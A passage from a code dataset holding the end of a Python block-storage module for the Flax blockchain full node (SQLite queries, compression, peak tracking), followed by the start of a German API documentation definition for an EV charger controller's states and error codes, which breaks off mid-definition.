altered, they should also be altered\n # in the flax/cmds/db_upgrade.py file\n log.info(\"DB: Creating index is_fully_compactified\")\n await conn.execute(\n \"CREATE INDEX IF NOT EXISTS is_fully_compactified ON\"\n \" full_blocks(is_fully_compactified, in_main_chain) WHERE in_main_chain=1\"\n )\n log.info(\"DB: Creating index main_chain\")\n await conn.execute(\n \"CREATE INDEX IF NOT EXISTS main_chain ON full_blocks(height, in_main_chain) WHERE in_main_chain=1\"\n )\n\n else:\n\n await conn.execute(\n \"CREATE TABLE IF NOT EXISTS full_blocks(header_hash text PRIMARY KEY, height bigint,\"\n \" is_block tinyint, is_fully_compactified tinyint, block blob)\"\n )\n\n # Block records\n await conn.execute(\n \"CREATE TABLE IF NOT EXISTS block_records(header_hash \"\n \"text PRIMARY KEY, prev_hash text, height bigint,\"\n \"block blob, sub_epoch_summary blob, is_peak tinyint, is_block tinyint)\"\n )\n\n # Sub epoch segments for weight proofs\n await conn.execute(\n \"CREATE TABLE IF NOT EXISTS sub_epoch_segments_v3(ses_block_hash text PRIMARY KEY,\"\n \"challenge_segments blob)\"\n )\n\n # Height index so we can look up in order of height for sync purposes\n log.info(\"DB: Creating index full_block_height\")\n await conn.execute(\"CREATE INDEX IF NOT EXISTS full_block_height on full_blocks(height)\")\n log.info(\"DB: Creating index is_fully_compactified\")\n await conn.execute(\n \"CREATE INDEX IF NOT EXISTS is_fully_compactified on full_blocks(is_fully_compactified)\"\n )\n\n log.info(\"DB: Creating index height\")\n await conn.execute(\"CREATE INDEX IF NOT EXISTS height on block_records(height)\")\n\n log.info(\"DB: Creating index peak\")\n await conn.execute(\"CREATE INDEX IF NOT EXISTS peak on block_records(is_peak)\")\n\n return self\n\n def maybe_from_hex(self, field: Union[bytes, str]) -> bytes32:\n if self.db_wrapper.db_version == 2:\n assert isinstance(field, bytes)\n return bytes32(field)\n else:\n assert isinstance(field, str)\n return bytes32.fromhex(field)\n\n def maybe_to_hex(self, field: bytes) -> Any:\n if self.db_wrapper.db_version == 2:\n return field\n else:\n return field.hex()\n\n def compress(self, block: FullBlock) -> bytes:\n ret: bytes = zstd.compress(bytes(block))\n return ret\n\n def maybe_decompress(self, block_bytes: bytes) -> FullBlock:\n if self.db_wrapper.db_version == 2:\n ret: FullBlock = FullBlock.from_bytes(zstd.decompress(block_bytes))\n else:\n ret = FullBlock.from_bytes(block_bytes)\n return ret\n\n def maybe_decompress_blob(self, block_bytes: bytes) -> bytes:\n if self.db_wrapper.db_version == 2:\n ret: bytes = zstd.decompress(block_bytes)\n return ret\n else:\n return block_bytes\n\n async def rollback(self, height: int) -> None:\n if self.db_wrapper.db_version == 2:\n async with self.db_wrapper.writer_maybe_transaction() as conn:\n await conn.execute(\n \"UPDATE OR FAIL full_blocks SET in_main_chain=0 WHERE height>? AND in_main_chain=1\", (height,)\n )\n\n async def set_in_chain(self, header_hashes: List[Tuple[bytes32]]) -> None:\n if self.db_wrapper.db_version == 2:\n async with self.db_wrapper.writer_maybe_transaction() as conn:\n await conn.executemany(\n \"UPDATE OR FAIL full_blocks SET in_main_chain=1 WHERE header_hash=?\", header_hashes\n )\n\n async def replace_proof(self, header_hash: bytes32, block: FullBlock) -> None:\n\n assert header_hash == block.header_hash\n\n block_bytes: bytes\n if self.db_wrapper.db_version == 2:\n block_bytes = self.compress(block)\n else:\n block_bytes = bytes(block)\n\n self.block_cache.put(header_hash, block)\n\n async with self.db_wrapper.writer_maybe_transaction() as conn:\n await conn.execute(\n \"UPDATE full_blocks SET block=?,is_fully_compactified=? WHERE header_hash=?\",\n (\n block_bytes,\n int(block.is_fully_compactified()),\n self.maybe_to_hex(header_hash),\n ),\n )\n\n async def add_full_block(self, header_hash: bytes32, block: FullBlock, block_record: BlockRecord) -> None:\n self.block_cache.put(header_hash, block)\n\n if self.db_wrapper.db_version == 2:\n\n ses: Optional[bytes] = (\n None\n if block_record.sub_epoch_summary_included is None\n else bytes(block_record.sub_epoch_summary_included)\n )\n\n async with self.db_wrapper.writer_maybe_transaction() as conn:\n await conn.execute(\n \"INSERT OR IGNORE INTO full_blocks VALUES(?, ?, ?, ?, ?, ?, ?, ?)\",\n (\n header_hash,\n block.prev_header_hash,\n block.height,\n ses,\n int(block.is_fully_compactified()),\n False, # in_main_chain\n self.compress(block),\n bytes(block_record),\n ),\n )\n\n else:\n async with self.db_wrapper.writer_maybe_transaction() as conn:\n await conn.execute(\n \"INSERT OR IGNORE INTO full_blocks VALUES(?, ?, ?, ?, ?)\",\n (\n header_hash.hex(),\n block.height,\n int(block.is_transaction_block()),\n int(block.is_fully_compactified()),\n bytes(block),\n ),\n )\n\n await conn.execute(\n \"INSERT OR IGNORE INTO block_records VALUES(?, ?, ?, ?,?, ?, ?)\",\n (\n header_hash.hex(),\n block.prev_header_hash.hex(),\n block.height,\n bytes(block_record),\n None\n if block_record.sub_epoch_summary_included is None\n else bytes(block_record.sub_epoch_summary_included),\n False,\n block.is_transaction_block(),\n ),\n )\n\n async def persist_sub_epoch_challenge_segments(\n self, ses_block_hash: bytes32, segments: List[SubEpochChallengeSegment]\n ) -> None:\n async with self.db_wrapper.writer_maybe_transaction() as conn:\n await conn.execute(\n \"INSERT OR REPLACE INTO sub_epoch_segments_v3 VALUES(?, ?)\",\n (self.maybe_to_hex(ses_block_hash), bytes(SubEpochSegments(segments))),\n )\n\n async def get_sub_epoch_challenge_segments(\n self,\n ses_block_hash: bytes32,\n ) -> Optional[List[SubEpochChallengeSegment]]:\n cached: Optional[List[SubEpochChallengeSegment]] = self.ses_challenge_cache.get(ses_block_hash)\n if cached is not None:\n return cached\n\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"SELECT challenge_segments from sub_epoch_segments_v3 WHERE ses_block_hash=?\",\n (self.maybe_to_hex(ses_block_hash),),\n ) as cursor:\n row = await cursor.fetchone()\n\n if row is not None:\n challenge_segments: List[SubEpochChallengeSegment] = SubEpochSegments.from_bytes(row[0]).challenge_segments\n self.ses_challenge_cache.put(ses_block_hash, challenge_segments)\n return challenge_segments\n return None\n\n def rollback_cache_block(self, header_hash: bytes32) -> None:\n try:\n self.block_cache.remove(header_hash)\n except KeyError:\n # this is best effort. When rolling back, we may not have added the\n # block to the cache yet\n pass\n\n async def get_full_block(self, header_hash: bytes32) -> Optional[FullBlock]:\n cached: Optional[FullBlock] = self.block_cache.get(header_hash)\n if cached is not None:\n log.debug(f\"cache hit for block {header_hash.hex()}\")\n return cached\n log.debug(f\"cache miss for block {header_hash.hex()}\")\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"SELECT block from full_blocks WHERE header_hash=?\", (self.maybe_to_hex(header_hash),)\n ) as cursor:\n row = await cursor.fetchone()\n if row is not None:\n block = self.maybe_decompress(row[0])\n self.block_cache.put(header_hash, block)\n return block\n return None\n\n async def get_full_block_bytes(self, header_hash: bytes32) -> Optional[bytes]:\n cached = self.block_cache.get(header_hash)\n if cached is not None:\n log.debug(f\"cache hit for block {header_hash.hex()}\")\n return bytes(cached)\n log.debug(f\"cache miss for block {header_hash.hex()}\")\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"SELECT block from full_blocks WHERE header_hash=?\", (self.maybe_to_hex(header_hash),)\n ) as cursor:\n row = await cursor.fetchone()\n if row is not None:\n if self.db_wrapper.db_version == 2:\n ret: bytes = zstd.decompress(row[0])\n else:\n ret = row[0]\n return ret\n\n return None\n\n async def get_full_blocks_at(self, heights: List[uint32]) -> List[FullBlock]:\n if len(heights) == 0:\n return []\n\n formatted_str = f'SELECT block from full_blocks WHERE height in ({\"?,\" * (len(heights) - 1)}?)'\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(formatted_str, heights) as cursor:\n ret: List[FullBlock] = []\n for row in await cursor.fetchall():\n ret.append(self.maybe_decompress(row[0]))\n return ret\n\n async def get_block_info(self, header_hash: bytes32) -> Optional[GeneratorBlockInfo]:\n\n cached = self.block_cache.get(header_hash)\n if cached is not None:\n log.debug(f\"cache hit for block {header_hash.hex()}\")\n return GeneratorBlockInfo(\n cached.foliage.prev_block_hash, cached.transactions_generator, cached.transactions_generator_ref_list\n )\n\n formatted_str = \"SELECT block, height from full_blocks WHERE header_hash=?\"\n async with self.db_wrapper.reader_no_transaction() as conn:\n row = await execute_fetchone(conn, formatted_str, (self.maybe_to_hex(header_hash),))\n if row is None:\n return None\n if self.db_wrapper.db_version == 2:\n block_bytes = zstd.decompress(row[0])\n else:\n block_bytes = row[0]\n\n try:\n return block_info_from_block(block_bytes)\n except Exception as e:\n log.exception(f\"cheap parser failed for block at height {row[1]}: {e}\")\n # this is defensive, on the off-chance that\n # block_info_from_block() fails, fall back to the reliable\n # definition of parsing a block\n b = FullBlock.from_bytes(block_bytes)\n return GeneratorBlockInfo(\n b.foliage.prev_block_hash, b.transactions_generator, b.transactions_generator_ref_list\n )\n\n async def get_generator(self, header_hash: bytes32) -> Optional[SerializedProgram]:\n\n cached = self.block_cache.get(header_hash)\n if cached is not None:\n log.debug(f\"cache hit for block {header_hash.hex()}\")\n return cached.transactions_generator\n\n formatted_str = \"SELECT block, height from full_blocks WHERE header_hash=?\"\n async with self.db_wrapper.reader_no_transaction() as conn:\n row = await execute_fetchone(conn, formatted_str, (self.maybe_to_hex(header_hash),))\n if row is None:\n return None\n if self.db_wrapper.db_version == 2:\n block_bytes = zstd.decompress(row[0])\n else:\n block_bytes = row[0]\n\n try:\n return generator_from_block(block_bytes)\n except Exception as e:\n log.error(f\"cheap parser failed for block at height {row[1]}: {e}\")\n # this is defensive, on the off-chance that\n # generator_from_block() fails, fall back to the reliable\n # definition of parsing a block\n b = FullBlock.from_bytes(block_bytes)\n return b.transactions_generator\n\n async def get_generators_at(self, heights: List[uint32]) -> List[SerializedProgram]:\n assert self.db_wrapper.db_version == 2\n\n if len(heights) == 0:\n return []\n\n generators: Dict[uint32, SerializedProgram] = {}\n formatted_str = (\n f\"SELECT block, height from full_blocks \"\n f'WHERE in_main_chain=1 AND height in ({\"?,\" * (len(heights) - 1)}?)'\n )\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(formatted_str, heights) as cursor:\n async for row in cursor:\n block_bytes = zstd.decompress(row[0])\n\n try:\n gen = generator_from_block(block_bytes)\n except Exception as e:\n log.error(f\"cheap parser failed for block at height {row[1]}: {e}\")\n # this is defensive, on the off-chance that\n # generator_from_block() fails, fall back to the reliable\n # definition of parsing a block\n b = FullBlock.from_bytes(block_bytes)\n gen = b.transactions_generator\n if gen is None:\n raise ValueError(Err.GENERATOR_REF_HAS_NO_GENERATOR)\n generators[uint32(row[1])] = gen\n\n return [generators[h] for h in heights]\n\n async def get_block_records_by_hash(self, header_hashes: List[bytes32]) -> List[BlockRecord]:\n \"\"\"\n Returns a list of Block Records, ordered by the same order in which header_hashes are passed in.\n Throws an exception if the blocks are not present\n \"\"\"\n if len(header_hashes) == 0:\n return []\n\n all_blocks: Dict[bytes32, BlockRecord] = {}\n if self.db_wrapper.db_version == 2:\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"SELECT header_hash,block_record FROM full_blocks \"\n f'WHERE header_hash in ({\"?,\" * (len(header_hashes) - 1)}?)',\n header_hashes,\n ) as cursor:\n for row in await cursor.fetchall():\n header_hash = bytes32(row[0])\n all_blocks[header_hash] = BlockRecord.from_bytes(row[1])\n else:\n formatted_str = f'SELECT block from block_records WHERE header_hash in ({\"?,\" * (len(header_hashes) - 1)}?)'\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(formatted_str, [hh.hex() for hh in header_hashes]) as cursor:\n for row in await cursor.fetchall():\n block_rec: BlockRecord = BlockRecord.from_bytes(row[0])\n all_blocks[block_rec.header_hash] = block_rec\n\n ret: List[BlockRecord] = []\n for hh in header_hashes:\n if hh not in all_blocks:\n raise ValueError(f\"Header hash {hh} not in the blockchain\")\n ret.append(all_blocks[hh])\n return ret\n\n async def get_block_bytes_by_hash(self, header_hashes: List[bytes32]) -> List[bytes]:\n \"\"\"\n Returns a list of Full Blocks block blobs, ordered by the same order in which header_hashes are passed in.\n Throws an exception if the blocks are not present\n \"\"\"\n\n if len(header_hashes) == 0:\n return []\n\n # sqlite on python3.7 on windows has issues with large variable substitutions\n assert len(header_hashes) < 901\n header_hashes_db: Sequence[Union[bytes32, str]]\n if self.db_wrapper.db_version == 2:\n header_hashes_db = header_hashes\n else:\n header_hashes_db = [hh.hex() for hh in header_hashes]\n formatted_str = (\n f'SELECT header_hash, block from full_blocks WHERE header_hash in ({\"?,\" * (len(header_hashes_db) - 1)}?)'\n )\n all_blocks: Dict[bytes32, bytes] = {}\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(formatted_str, header_hashes_db) as cursor:\n for row in await cursor.fetchall():\n header_hash = self.maybe_from_hex(row[0])\n all_blocks[header_hash] = self.maybe_decompress_blob(row[1])\n\n ret: List[bytes] = []\n for hh in header_hashes:\n block = all_blocks.get(hh)\n if block is not None:\n ret.append(block)\n else:\n raise ValueError(f\"Header hash {hh} not in the blockchain\")\n return ret\n\n async def get_blocks_by_hash(self, header_hashes: List[bytes32]) -> List[FullBlock]:\n \"\"\"\n Returns a list of Full Blocks blocks, ordered by the same order in which header_hashes are passed in.\n Throws an exception if the blocks are not present\n \"\"\"\n\n if len(header_hashes) == 0:\n return []\n\n header_hashes_db: Sequence[Union[bytes32, str]]\n if self.db_wrapper.db_version == 2:\n header_hashes_db = header_hashes\n else:\n header_hashes_db = [hh.hex() for hh in header_hashes]\n formatted_str = (\n f'SELECT header_hash, block from full_blocks WHERE header_hash in ({\"?,\" * (len(header_hashes_db) - 1)}?)'\n )\n all_blocks: Dict[bytes32, FullBlock] = {}\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(formatted_str, header_hashes_db) as cursor:\n for row in await cursor.fetchall():\n header_hash = self.maybe_from_hex(row[0])\n full_block: FullBlock = self.maybe_decompress(row[1])\n all_blocks[header_hash] = full_block\n self.block_cache.put(header_hash, full_block)\n ret: List[FullBlock] = []\n for hh in header_hashes:\n if hh not in all_blocks:\n raise ValueError(f\"Header hash {hh} not in the blockchain\")\n ret.append(all_blocks[hh])\n return ret\n\n async def get_block_record(self, header_hash: bytes32) -> Optional[BlockRecord]:\n\n if self.db_wrapper.db_version == 2:\n\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"SELECT block_record FROM full_blocks WHERE header_hash=?\",\n (header_hash,),\n ) as cursor:\n row = await cursor.fetchone()\n if row is not None:\n return BlockRecord.from_bytes(row[0])\n\n else:\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"SELECT block from block_records WHERE header_hash=?\",\n (header_hash.hex(),),\n ) as cursor:\n row = await cursor.fetchone()\n if row is not None:\n return BlockRecord.from_bytes(row[0])\n return None\n\n async def get_block_records_in_range(\n self,\n start: int,\n stop: int,\n ) -> Dict[bytes32, BlockRecord]:\n \"\"\"\n Returns a dictionary with all blocks in range between start and stop\n if present.\n \"\"\"\n\n ret: Dict[bytes32, BlockRecord] = {}\n if self.db_wrapper.db_version == 2:\n\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"SELECT header_hash, block_record FROM full_blocks WHERE height >= ? AND height <= ?\",\n (start, stop),\n ) as cursor:\n for row in await cursor.fetchall():\n header_hash = bytes32(row[0])\n ret[header_hash] = BlockRecord.from_bytes(row[1])\n\n else:\n\n formatted_str = f\"SELECT header_hash, block from block_records WHERE height >= {start} and height <= {stop}\"\n\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with await conn.execute(formatted_str) as cursor:\n for row in await cursor.fetchall():\n header_hash = self.maybe_from_hex(row[0])\n ret[header_hash] = BlockRecord.from_bytes(row[1])\n\n return ret\n\n async def get_block_bytes_in_range(\n self,\n start: int,\n stop: int,\n ) -> List[bytes]:\n \"\"\"\n Returns a list with all full blocks in range between start and stop\n if present.\n \"\"\"\n\n maybe_decompress_blob = self.maybe_decompress_blob\n assert self.db_wrapper.db_version == 2\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"SELECT block FROM full_blocks WHERE height >= ? AND height <= ? and in_main_chain=1\",\n (start, stop),\n ) as cursor:\n rows: List[sqlite3.Row] = list(await cursor.fetchall())\n if len(rows) != (stop - start) + 1:\n raise ValueError(f\"Some blocks in range {start}-{stop} were not found.\")\n return [maybe_decompress_blob(row[0]) for row in rows]\n\n async def get_peak(self) -> Optional[Tuple[bytes32, uint32]]:\n\n if self.db_wrapper.db_version == 2:\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\"SELECT hash FROM current_peak WHERE key = 0\") as cursor:\n peak_row = await cursor.fetchone()\n if peak_row is None:\n return None\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\"SELECT height FROM full_blocks WHERE header_hash=?\", (peak_row[0],)) as cursor:\n peak_height = await cursor.fetchone()\n if peak_height is None:\n return None\n return bytes32(peak_row[0]), uint32(peak_height[0])\n else:\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\"SELECT header_hash, height from block_records WHERE is_peak = 1\") as cursor:\n peak_row = await cursor.fetchone()\n if peak_row is None:\n return None\n return bytes32(bytes.fromhex(peak_row[0])), uint32(peak_row[1])\n\n async def get_block_records_close_to_peak(\n self, blocks_n: int\n ) -> Tuple[Dict[bytes32, BlockRecord], Optional[bytes32]]:\n \"\"\"\n Returns a dictionary with all blocks that have height >= peak height - blocks_n, as well as the\n peak header hash.\n \"\"\"\n\n peak = await self.get_peak()\n if peak is None:\n return {}, None\n\n ret: Dict[bytes32, BlockRecord] = {}\n if self.db_wrapper.db_version == 2:\n\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"SELECT header_hash, block_record FROM full_blocks WHERE height >= ?\",\n (peak[1] - blocks_n,),\n ) as cursor:\n for row in await cursor.fetchall():\n header_hash = bytes32(row[0])\n ret[header_hash] = BlockRecord.from_bytes(row[1])\n\n else:\n formatted_str = f\"SELECT header_hash, block from block_records WHERE height >= {peak[1] - blocks_n}\"\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(formatted_str) as cursor:\n for row in await cursor.fetchall():\n header_hash = self.maybe_from_hex(row[0])\n ret[header_hash] = BlockRecord.from_bytes(row[1])\n\n return ret, peak[0]\n\n async def set_peak(self, header_hash: bytes32) -> None:\n # We need to be in a sqlite transaction here.\n # Note: we do not commit this to the database yet, as we need to also change the coin store\n\n if self.db_wrapper.db_version == 2:\n # Note: we use the key field as 0 just to ensure all inserts replace the existing row\n async with self.db_wrapper.writer_maybe_transaction() as conn:\n await conn.execute(\"INSERT OR REPLACE INTO current_peak VALUES(?, ?)\", (0, header_hash))\n else:\n async with self.db_wrapper.writer_maybe_transaction() as conn:\n await conn.execute(\"UPDATE block_records SET is_peak=0 WHERE is_peak=1\")\n await conn.execute(\n \"UPDATE block_records SET is_peak=1 WHERE header_hash=?\",\n (self.maybe_to_hex(header_hash),),\n )\n\n async def is_fully_compactified(self, header_hash: bytes32) -> Optional[bool]:\n async with self.db_wrapper.writer_maybe_transaction() as conn:\n async with conn.execute(\n \"SELECT is_fully_compactified from full_blocks WHERE header_hash=?\", (self.maybe_to_hex(header_hash),)\n ) as cursor:\n row = await cursor.fetchone()\n if row is None:\n return None\n return bool(row[0])\n\n async def get_random_not_compactified(self, number: int) -> List[int]:\n\n if self.db_wrapper.db_version == 2:\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n f\"SELECT height FROM full_blocks WHERE in_main_chain=1 AND is_fully_compactified=0 \"\n f\"ORDER BY RANDOM() LIMIT {number}\"\n ) as cursor:\n rows = await cursor.fetchall()\n else:\n # Since orphan blocks do not get compactified, we need to check whether all blocks with a\n # certain height are not compact. And if we do have compact orphan blocks, then all that\n # happens is that the occasional chain block stays uncompact - not ideal, but harmless.\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n f\"SELECT height FROM full_blocks GROUP BY height HAVING sum(is_fully_compactified)=0 \"\n f\"ORDER BY RANDOM() LIMIT {number}\"\n ) as cursor:\n rows = await cursor.fetchall()\n\n heights = [int(row[0]) for row in rows]\n\n return heights\n\n async def count_compactified_blocks(self) -> int:\n if self.db_wrapper.db_version == 2:\n # DB V2 has an index on is_fully_compactified only for blocks in the main chain\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"select count(*) from full_blocks where is_fully_compactified=1 and in_main_chain=1\"\n ) as cursor:\n row = await cursor.fetchone()\n else:\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\"select count(*) from full_blocks where is_fully_compactified=1\") as cursor:\n row = await cursor.fetchone()\n\n assert row is not None\n\n [count] = row\n return int(count)\n\n async def count_uncompactified_blocks(self) -> int:\n if self.db_wrapper.db_version == 2:\n # DB V2 has an index on is_fully_compactified only for blocks in the main chain\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"select count(*) from full_blocks where is_fully_compactified=0 and in_main_chain=1\"\n ) as cursor:\n row = await cursor.fetchone()\n else:\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\"select count(*) from full_blocks where is_fully_compactified=0\") as cursor:\n row = await cursor.fetchone()\n\n assert row is not None\n\n [count] = row\n return int(count)\n","repo_name":"Flax-Network/flax-blockchain","sub_path":"flax/full_node/block_store.py","file_name":"block_store.py","file_ext":"py","file_size_in_byte":32756,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"35"} +{"seq_id":"45195521896","text":"from api_doc_common import *\n\nevse = Module(\"evse\", \"Ladecontroller (EVSE)\", \"Benötigt das Feature \\\"evse\\\"\", Version.WARP1 | Version.WARP2,[\n Func(\"state\", FuncType.STATE, Elem.OBJECT(\"Der Zustand des Ladecontrollers.\", members={\n \"iec61851_state\": Elem.INT(\"Der aktuelle Zustand nach IEC 61851\", constants=[\n Const(0, \"A: Nicht verbunden\"),\n Const(1, \"B: Verbunden\"),\n Const(2, \"C: Lädt\"),\n Const(3, \"D: Lädt mit Belüftung (nicht unterstützt)\"),\n Const(4, \"E/F: Fehler\"),\n ]),\n \"charger_state\": Elem.INT(\"Der aktuelle Zustand, aufbereitet vom Ladecontroller\", constants=[\n Const(0, \"Nicht verbunden\"),\n Const(1, \"Warte auf Ladefreigabe\"),\n Const(2, \"Ladebereit\"),\n Const(3, \"Lädt\"),\n Const(4, \"Fehler\"),\n ]),\n \"contactor_state\": Elem.INT(\"Schützüberwachung. Überwacht wird die Spannung vor und nach dem Schütz\", constants=[\n Const(0, \"Nicht stromführend vor und nach dem Schütz\"),\n Const(1, \"Stromführend vor, aber nicht stromführend nach dem Schütz\"),\n Const(2, \"Nicht stromführend vor, aber stromführend nach dem Schütz\"),\n Const(3, \"Stromführend vor und nach dem Schütz\"),\n ]),\n \"contactor_error\": Elem.INT(\"Fehlercode der Schützüberwachung. Ein Wert ungleich 0 zeigt einen Fehler an.\", constants=[\n Const(0, \"Kein Fehler\"),\n Const(1, \"Schütz sollte durchschalten.
Kein Strom vor Schütz, kein Strom nach Schütz.
Stromversorgung prüfen.\"),\n Const(2, \"Schütz sollte durchschalten.
Strom vor Schütz, kein Strom nach Schütz.
Schütz defekt?\"),\n Const(3, \"Schütz sollte durchschalten.
Kein Strom vor Schütz, Strom nach Schütz.
Verkabelung prüfen.\"),\n Const(4, \"Schütz sollte nicht durchschalten.
Kein Strom vor Schütz, kein Strom nach Schütz.
Stromversorgung prüfen.\"),\n Const(5, \"Schütz sollte nicht durchschalten.
Kein Strom vor Schütz, Strom nach Schütz.
Verkabelung prüfen.\"),\n Const(6, \"Schütz sollte nicht durchschalten.
Strom vor Schütz, Strom nach Schütz.
Schütz defekt?\"),\n ]),\n \"allowed_charging_current\": Elem.INT(\"Maximal erlaubter Ladestrom, der dem Fahrzeug zur Verfügung gestellt wird. Dieser Strom ist das Minimum der Stromgrenzen aller Ladeslots.\", unit=Units.mA),\n \"error_state\": Elem.INT('Der aktuelle Fehlerzustand. Siehe Handbuch für Details.', constants=[\n Const(0, \"OK\"),\n Const(2, \"Schalterfehler\"),\n Const(3, \"DC-Fehlerstromüberwachungsfehler\"),\n Const(4, \"Schützfehler\"),\n Const(5, \"Kommunikationsfehler\"),\n ]),\n \"lock_state\": Elem.INT(\"Zustand der Kabelverriegelung (nur relevant für Wallboxen mit Typ-2-Dose)\", constants=[\n Const(0, \"Initialisierung\"),\n Const(1, \"Offen\"),\n Const(2, \"Schließend\"),\n Const(3, \"Geschlossen\"),\n Const(4, \"Öffnend\"),\n Const(5, \"Fehler\"),\n ]),\n \"dc_fault_current_state\": Elem.INT(\"Der Zustand des DC-Fehlerstrom-Schutzmoduls. Falls ein Gleichstromfehler auftritt, kann nicht mehr geladen werden, bis das Schutzmodul zurückgesetzt wurde. Vor dem Zurücksetzen muss der Grund des Fehlers unbedingt behoben werden! {{{ref:evse/reset_dc_fault_current_state}}} setzt das Modul zurück.\", constants=[\n Const(0, \"Kein Fehler\"),\n Const(1, \"6 mA Fehlerstrom detektiert\"),\n Const(2, \"Systemfehler\"),\n Const(3, \"Unbekannter fehler\"),\n Const(4, \"Kalibrierungsfehler\"),\n ], version=Version.WARP2)\n })\n ),\n\n Func(\"hardware_configuration\", FuncType.STATE, Elem.OBJECT(\"Die Hardwarekonfiguration des Ladecontrollers.\", members={\n \"jumper_configuration\": Elem.INT(\"Der Maximalstrom des eingehenden Kabels. Dieser Strom wird auf dem Ladecontroller durch Jumper oder eine Steckplatine mit Schaltern konfiguriert.\", constants=[\n Const(0, \"6 Ampere\"),\n Const(1, \"10 Ampere\"),\n Const(2, \"13 Ampere\"),\n Const(3, \"16 Ampere\"),\n Const(4, \"20 Ampere\"),\n Const(5, \"25 Ampere\"),\n Const(6, \"32 Ampere\"),\n Const(7, \"Kontrolliert durch Software\"),\n Const(8, \"Nicht konfiguriert\"),\n ]),\n \"has_lock_switch\": Elem.BOOL(\"Gibt an, ob die Wallbox über eine Kabelverriegelung verfügt.\", constants=[\n Const(False, \"Wallbox hat fest angeschlagenes Typ-2-Ladekabel\"),\n Const(True, \"Wallbox hat eine Typ-2-Dose mit Kabelverriegelung\"),\n ]),\n \"evse_version\": Elem.INT(\"Hardware-Version des Ladecontrollers\", constants=[\n Const(14, \"EVSE 1.4\", Version.WARP1),\n Const(15, \"EVSE 1.5\", Version.WARP1),\n Const(20, \"EVSE 2.0\", Version.WARP2)\n ]),\n \"energy_meter_type\": Elem.INT(\"Typ des verbauten Stromzählers. Nicht jeder Stromzähler wird von jeder Wallbox unterstützt!\", constants=[\n Const(0, \"Kein Stromzähler verfügbar\"),\n Const(1, \"SDM72\", Version.WARP1),\n Const(2, \"SDM630\", Version.WARP2),\n Const(3, \"SDM72V2\", Version.WARP2)\n ], version=Version.WARP2)\n })\n ),\n\n Func(\"slots\", FuncType.STATE, Elem.ARRAY(\"Der Zustand der Ladeslots. Siehe TODO LINK für Details.\", members=[\n * 14 * [Elem.OBJECT(\"Ein Ladeslot\", members = {\n \"max_current\": Elem.INT(\"Maximal erlaubter Ladestrom. 6000 (=6 Ampere) bis 32000 (=32 Ampere) oder 0 falls der Slot blockiert.\", unit=Units.mA),\n \"active\": Elem.BOOL(\"Gibt an ob dieser Slot aktiv ist.\", constants=[\n Const(True, \"Slot ist aktiv\"),\n Const(False, \"Slot ist nicht aktiv\"),\n ]),\n \"clear_on_disconnect\": Elem.BOOL(\"Gibt an, ob der Ladestrom dieses Slots beim Abziehen eines Fahrzeugs auf 0 gesetzt wird.\", constants=[\n Const(True, \"Slot wird beim Abziehen blockieren\"),\n Const(False, \"Slot wird gesetzten Ladestrom beim Abziehen beibehalten\"),\n ]),\n })]\n ])\n ),\n\n Func(\"button_state\", FuncType.STATE, Elem.OBJECT(\"Der Zustand des Tasters in der Frontblende.\", members= {\n \"button_press_time\": Elem.INT(\"Zeit zu der zuletzt der Taster gedrückt wurde. 0 falls der Taster seit dem Start des Ladecontrollers nicht betätigt wurde.

Achtung: Diese Zeit wird direkt über den Takt des Prozessors gemessen. Die Genauigkeit ist damit nur ausreichend für Zeitmessungen im Bereich Minuten bis wenige Stunden. Die Zeitmessung läuft nach ungefähr 50 Tagen über und beginnt wieder bei 0.\", unit=Units.ms),\n \"button_release_time\": Elem.INT(\"Zeit zu der zuletzt der Taster losgelassen wurde. 0 falls der Taster seit dem Start des Ladecontrollers nicht betätigt wurde.

Achtung: Diese Zeit wird direkt über den Takt des Prozessors gemessen. Die Genauigkeit ist damit nur ausreichend für Zeitmessungen im Bereich Minuten bis wenige Stunden. Die Zeitmessung läuft nach ungefähr 50 Tagen über und beginnt wieder bei 0.\", unit=Units.ms),\n \"button_pressed\": Elem.BOOL(\"true, falls der Taster derzeit gedrückt ist, sonst false\"),\n })\n ),\n\n Func(\"indicator_led\", FuncType.STATE, Elem.OBJECT(\"Der Zustand der LED im Taster. Kann über {{{ref:evse/indicator_led_update}}} mit dem selben Payload geschrieben werden, falls die LED-Steuerung per API (siehe {{{ref:evse/led_configuration}}}) erlaubt wurde.\", members={\n \"indication\": Elem.INT(\"Aktuell gesetzter Zustand.\", constants=[\n Const(-1, \"EVSE kontrolliert LED\"),\n Const(0, \"Aus\"),\n Const(\"1..254\", \"Per PWM gedimmtes leuchten\"),\n Const(255, \"An\"),\n Const(1001, \"Bestätigendes Blinken (z.B: NFC-Tag wurde erkannt)\"),\n Const(1002, \"Ablehnendes Blinken (z.B: NFC-Tag ist unbekannt)\"),\n Const(1003, \"Aufforderndes Blinken (z.B: NFC-Tag wird zum Laden benötigt)\"),\n Const(\"2001..2010\", 